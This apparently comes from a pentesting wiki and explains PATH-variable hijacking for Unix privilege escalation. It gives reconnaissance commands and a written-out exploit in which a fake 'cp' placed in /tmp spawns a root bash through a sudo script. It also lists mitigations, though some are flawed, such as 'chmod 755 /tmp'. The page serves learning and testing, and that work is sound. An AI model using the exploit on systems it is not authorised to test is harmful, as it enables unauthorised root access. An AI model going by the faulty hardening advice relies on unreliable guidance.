PATH Environment Variable Abuse

Overview

Abusing the PATH environment variable in Unix/Linux allows attackers to escalate privileges by exploiting scripts, cron jobs, or SUID binaries that use relative command paths, executing malicious binaries in user-controlled directories.

CWE Mappings: CWE-426 (Untrusted Search Path), CWE-732 (Incorrect Permissions)

Common Vulnerabilities

Insecure Command Execution: Scripts/binaries use relative commands (e.g., cp vs /bin/cp) in privileged contexts.
Misconfigured Cron Jobs: Cron jobs run as root without PATH sanitization, using relative commands.
SUID/SGID Binaries: Execute commands without absolute paths, allowing PATH manipulation.
Systemd Services: Run scripts with relative commands and unsanitized PATH.

Impact

Privilege Escalation: Gain root or high-privilege access.
Code Execution: Run arbitrary code with elevated permissions.
Persistence: Install backdoors via modified scripts.
Data Access: Access sensitive system resources.

Detection

Reconnaissance

# Find SUID/SGID binaries
find / -perm -4000 -o -perm -2000 2>/dev/null
# Check cron jobs
ls -la /etc/cron* /var/spool/cron/crontabs
# Inspect PATH
echo $PATH

Analysis

# Search scripts for relative commands
grep -rE '\b(cp|mv|tar|cat|sh|bash)\b' /etc/cron* /opt
# Analyze SUID binaries
strings /path/to/suid_binary | grep -E 'cp|mv|tar|sh|bash'
# Check systemd services
grep -r 'ExecStart.*\.sh' /etc/systemd /usr/lib/systemd

Exploitation

Malicious Binary Injection

# Create malicious binary
echo -e '#!/bin/bash\n/bin/bash' > /tmp/cp
chmod +x /tmp/cp
# Modify PATH
export PATH=/tmp:$PATH
# Trigger script
sudo /path/to/vulnerable_script.sh

Verify

whoami  # Should return 'root'
tail -f /var/log/syslog | grep -i 'command'

Mitigation

Use Absolute Paths:

# Good
/bin/cp /etc/passwd /tmp/passwd.bak

Sanitize PATH:

export PATH=/bin:/usr/bin:/sbin:/usr/sbin

Restrict Permissions:

chmod u-s /path/to/binary
chmod 755 /tmp

Drop Privileges:
```
sudo -u nobody /path/to/script.sh
```

Testing Checklist

Identify SUID/SGID binaries and cron jobs
Check for relative commands in scripts
Test PATH manipulation
Verify escalation and monitor logs

Tools

Manual: find, grep, strings, ltrace, ps
Automated: LinPEAS, LinEnum, pspy, Metasploit
Labs: Hack The Box, TryHackMe, VulnHub, OverTheWire

Red Flags

SUID binaries with relative commands
Cron jobs without PATH sanitization
Root scripts in writable directories
Systemd services with user-controlled scrip

PreviousInsecure System Components NextUpgrading to Fully Interactive TTY Shells

Last updated 8 months ago

hashtagOverview

hashtagCommon Vulnerabilities

hashtagImpact

hashtagDetection

hashtagReconnaissance

hashtagAnalysis

hashtagExploitation

hashtagMalicious Binary Injection

hashtagVerify

hashtagMitigation

hashtagTesting Checklist

hashtagTools

hashtagRed Flags